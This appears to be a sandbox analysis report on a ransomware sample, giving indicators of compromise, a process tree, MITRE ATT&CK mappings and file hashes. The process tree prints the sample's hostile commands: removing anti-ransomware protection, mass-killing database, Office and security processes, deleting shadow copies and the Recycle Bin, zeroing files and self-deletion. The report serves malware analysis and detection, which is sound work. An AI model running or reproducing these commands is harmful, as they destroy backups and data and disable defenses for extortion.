1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
Token: SeDebugPrivilege	1180	taskkill.exe
Token: SeDebugPrivilege	2860	taskkill.exe
Token: SeDebugPrivilege	2868	taskkill.exe
Token: SeDebugPrivilege	2928	taskkill.exe
Token: SeDebugPrivilege	3032	taskkill.exe
Token: SeDebugPrivilege	1156	taskkill.exe
Token: SeDebugPrivilege	2216	taskkill.exe
Token: SeDebugPrivilege	2660	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	2220	taskkill.exe
Token: SeDebugPrivilege	1112	taskkill.exe
Token: SeDebugPrivilege	2640	taskkill.exe
Token: SeDebugPrivilege	2200	taskkill.exe
Token: SeDebugPrivilege	2524	taskkill.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	1948	taskkill.exe
Token: SeDebugPrivilege	2508	taskkill.exe
Token: SeDebugPrivilege	1292	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	756	taskkill.exe
Token: SeDebugPrivilege	1232	taskkill.exe
Token: SeDebugPrivilege	2316	taskkill.exe
Token: SeDebugPrivilege	2612	taskkill.exe
Token: SeDebugPrivilege	2836	taskkill.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	2840	taskkill.exe
Token: SeDebugPrivilege	1708	taskkill.exe
Token: SeDebugPrivilege	2896	taskkill.exe
Token: SeDebugPrivilege	1180	taskkill.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: SeDebugPrivilege	1224	taskkill.exe
Token: SeDebugPrivilege	2400	taskkill.exe
Token: SeDebugPrivilege	2068	taskkill.exe
Token: SeDebugPrivilege	2052	taskkill.exe
Token: SeDebugPrivilege	1140	taskkill.exe
Token: SeDebugPrivilege	660	taskkill.exe
Token: SeDebugPrivilege	1900	taskkill.exe
Token: SeDebugPrivilege	2404	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	2060	taskkill.exe
Token: SeDebugPrivilege	884	taskkill.exe
Token: SeDebugPrivilege	3032	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	812	taskkill.exe
Token: SeDebugPrivilege	2044	taskkill.exe
Token: SeDebugPrivilege	848	taskkill.exe
Token: SeDebugPrivilege	1048	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 1180	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	31
PID 1976 wrote to memory of 1180	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	31
PID 1976 wrote to memory of 1180	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	31
PID 1976 wrote to memory of 1180	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	31
PID 1976 wrote to memory of 2980	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	33
PID 1976 wrote to memory of 2980	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	33
PID 1976 wrote to memory of 2980	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	33
PID 1976 wrote to memory of 2980	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	33
PID 1976 wrote to memory of 2944	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	35
PID 1976 wrote to memory of 2944	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	35
PID 1976 wrote to memory of 2944	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	35
PID 1976 wrote to memory of 2944	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	35
PID 1976 wrote to memory of 2804	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	37
PID 1976 wrote to memory of 2804	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	37
PID 1976 wrote to memory of 2804	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	37
PID 1976 wrote to memory of 2804	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	37
PID 1976 wrote to memory of 2796	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	39
PID 1976 wrote to memory of 2796	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	39
PID 1976 wrote to memory of 2796	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	39
PID 1976 wrote to memory of 2796	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	39
PID 1976 wrote to memory of 1956	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	40
PID 1976 wrote to memory of 1956	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	40
PID 1976 wrote to memory of 1956	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	40
PID 1976 wrote to memory of 1956	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	40
PID 1976 wrote to memory of 2988	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	41
PID 1976 wrote to memory of 2988	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	41
PID 1976 wrote to memory of 2988	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	41
PID 1976 wrote to memory of 2988	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	41
PID 1976 wrote to memory of 2816	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	45
PID 1976 wrote to memory of 2816	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	45
PID 1976 wrote to memory of 2816	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	45
PID 1976 wrote to memory of 2816	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	45
PID 1976 wrote to memory of 2732	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	47
PID 1976 wrote to memory of 2732	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	47
PID 1976 wrote to memory of 2732	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	47
PID 1976 wrote to memory of 2732	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	47
PID 1976 wrote to memory of 2756	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	48
PID 1976 wrote to memory of 2756	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	48
PID 1976 wrote to memory of 2756	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	48
PID 1976 wrote to memory of 2756	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	48
PID 1976 wrote to memory of 3000	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	50
PID 1976 wrote to memory of 3000	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	50
PID 1976 wrote to memory of 3000	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	50
PID 1976 wrote to memory of 3000	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	50
PID 1976 wrote to memory of 940	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	53
PID 1976 wrote to memory of 940	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	53
PID 1976 wrote to memory of 940	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	53
PID 1976 wrote to memory of 940	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	53
PID 1976 wrote to memory of 1420	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	55
PID 1976 wrote to memory of 1420	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	55
PID 1976 wrote to memory of 1420	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	55
PID 1976 wrote to memory of 1420	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	55
PID 1976 wrote to memory of 2860	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	57
PID 1976 wrote to memory of 2860	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	57
PID 1976 wrote to memory of 2860	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	57
PID 1976 wrote to memory of 2860	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	57
PID 1976 wrote to memory of 2868	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	58
PID 1976 wrote to memory of 2868	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	58
PID 1976 wrote to memory of 2868	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	58
PID 1976 wrote to memory of 2868	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	58
PID 1976 wrote to memory of 2928	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	60
PID 1976 wrote to memory of 2928	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	60
PID 1976 wrote to memory of 2928	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	60
PID 1976 wrote to memory of 2928	1976	1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe	60

C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
"C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe"
1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1180
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2980
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry key
  PID:2944
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2804
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:2796
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:1956
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:2988
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2816
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:2732
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:2756
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:3000
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:940
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:1420
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2860
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2868
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2928
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3032
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1156
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1728
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2660
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2216
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2220
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2640
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2524
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1472
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1948
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2508
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1292
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1768
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:756
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1232
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  PID:1572
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2316
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2612
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1932
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2676
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2840
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1708
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2896
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1180
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2628
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1224
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2400
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2068
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2052
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1140
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:660
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1900
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2404
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2020
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2060
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:884
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3032
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2080
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:812
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2044
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:848
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1048
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  PID:1408
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2884
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1436
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2860
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Mydoom Ransomwares\1a174a556ce8e7a22c66f515ae1591f775bb673e989d5a39334f901edccf5406.exe
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:2120
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.secure[[email protected]]

Filesize
180KB

MD5
d5aac1acc567bbce4c152c48194e8868

SHA1
19ab73648d09a503200cdd1dc2c37efa88c9babc

SHA256
15b9ea1c507b406ad74f4f701614705e623731aca7d96134018dfa2bd0607007

SHA512
8d3b368ab175e65d51c8a99ae339d45c3c8f6f855b8e668555b2fde915d992293bb03903dfa5eb7cf59780eb6521d098b6b84ed45d02686f2e2b6bff0b56c656

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Filesize
1KB

MD5
fa938778040d7c10af75e116e383690b

SHA1
ab6e0799be7fae1bce29c6d3265ea3a233747a18

SHA256
a5511f41b0de92c4089794b742cc0b59c6c21f874e10c266c33e0c5b4bfb187e

SHA512
34c9604c480e8c17366846c4df3010ccc664d11d12a485621d6446b31026675d14225e4ac7bfedb756ca805247d1185dcec43c6413303228a14397dab5cfca40

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Filesize
913B

MD5
ab400c6a76ff1def6b2f3f34c89fa050

SHA1
48315d41f1b416519638b8be8633a2bd9829518c

SHA256
160e6ed14518e5bf79c59d2d42f8f9d10a2ec649b41e82f488a68051187b6079

SHA512
3b30ee667071dc4d10bc30285290490cdeb87bedee93f75859adfbdcfa3b74f04ab993cb94e723138e620c118849abd737a1a809ce8cf1663082095f62f918dc

Download Submit
memory/1976-0-0x000000007471E000-0x000000007471F000-memory.dmp

Filesize
4KB

Download
memory/1976-1-0x00000000011B0000-0x00000000011D6000-memory.dmp

Filesize
152KB

Download
memory/1976-2-0x0000000074710000-0x0000000074DFE000-memory.dmp

Filesize
6.9MB

Download
memory/1976-235-0x000000007471E000-0x000000007471F000-memory.dmp

Filesize
4KB

Download
memory/1976-473-0x0000000074710000-0x0000000074DFE000-memory.dmp

Filesize
6.9MB

Download
memory/1976-489-0x0000000074710000-0x0000000074DFE000-memory.dmp

Filesize
6.9MB

Download